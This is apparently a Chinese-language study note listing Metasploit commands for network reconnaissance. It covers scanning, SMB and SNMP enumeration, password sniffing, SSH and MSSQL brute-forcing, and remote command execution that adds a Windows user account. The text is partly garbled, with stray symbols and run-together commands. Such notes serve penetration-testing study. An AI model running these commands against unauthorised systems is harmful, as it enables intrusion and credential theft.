msf学习笔记（4）

MSF信息收集

nmap扫描

db_nmap -sV 192.168.1.1

auxiliary扫描模块

RHOSTS <>RHOST
192.168.1.1-24 192.168.1.1/24
files:/root/ip.txt

arp扫描

msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ SMAC̵ THREADSҔ run

port扫描

use auxiliary/scanner/portscan/synset INTERFACE̵ PORTS̵ RHOSTS̵ THREADSҔ run

nmap ipid idle扫描

use auxiliary/scanner/ip/ipidseqset RHOSTS 192.168.1.0/24 Ҕ runnmap -PN -sI <dile地址> <扫描地址>

UDP扫描

use auxiliary/scanner/discovery/udp_sweepuse auxiliary/scanner/discovery/udp_probe

密码嗅探

use auxiliary/sniffer/psnuffle

SMMP扫描

use auxiliary/scanner/snmp/snmp_loginuse auxiliary/scanner/snmp/snmp_enumuse auxiliary/scanner/snmp/snmp_enumusers (windows)use auxiliary/scanner/snmp/snmp_enumshares (windows)

SMB扫描

SMB版本扫描

use auxiliary/scanner/smb/smb_version

扫描命名管道，判断SMB服务类型（账号、密码）

use auxiliary/scanner/smb/pipe_auditor

扫描通过SMB管道可以访问的RCERPC服务

use auxiliary/scanner/smb/pipe_dcerpc_auditor

SMB共享枚举（账号、密码）

use auxiliary/scanner/smb/smb_enumshares

SMB用户枚举（账号、密码）

use auxiliary/scanner/smb/smb_enumusers

SID枚举（账号、密码）

use auxiliary/scanner/smb/smb_lookupsid

SSH扫描

SSH版本扫描

use auxiliary/scanner/ssh/ssh_version

SMB密码爆破

use auxiliary/scanner/ssh/ssh_login    set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/    root_userpass.txt ； set VERBOSE false ； run

SSH公钥登录

use auxiliary/scanner/ssh/ssh_login_pubkey    set KEY_FILE id_rsa；set USERNAME root ；run

windows缺少的补丁

基于已经取得的session进行检测

use post/windows/gather/enum_patches    show advanced    set VERBOSE yes

mssql扫描

mssql扫描端口

TCP1433（动态端口）/UDP1434（查询TCP端口号）use auxiliary/scanner/mssql/mssql_ping

爆破mssql密码

use auxiliary/scanner/mssql/mssql_login

远程执行代码

auxiliary/admin/mssql/mssql_execset CMD net user user pass /ADD

FTP扫描

版本扫描

use auxiliary/scanner/ftp/ftp_versionuse auxiliary/scanner/ftp/anonymoususe auxiliary/scanner/ftp/ftp_login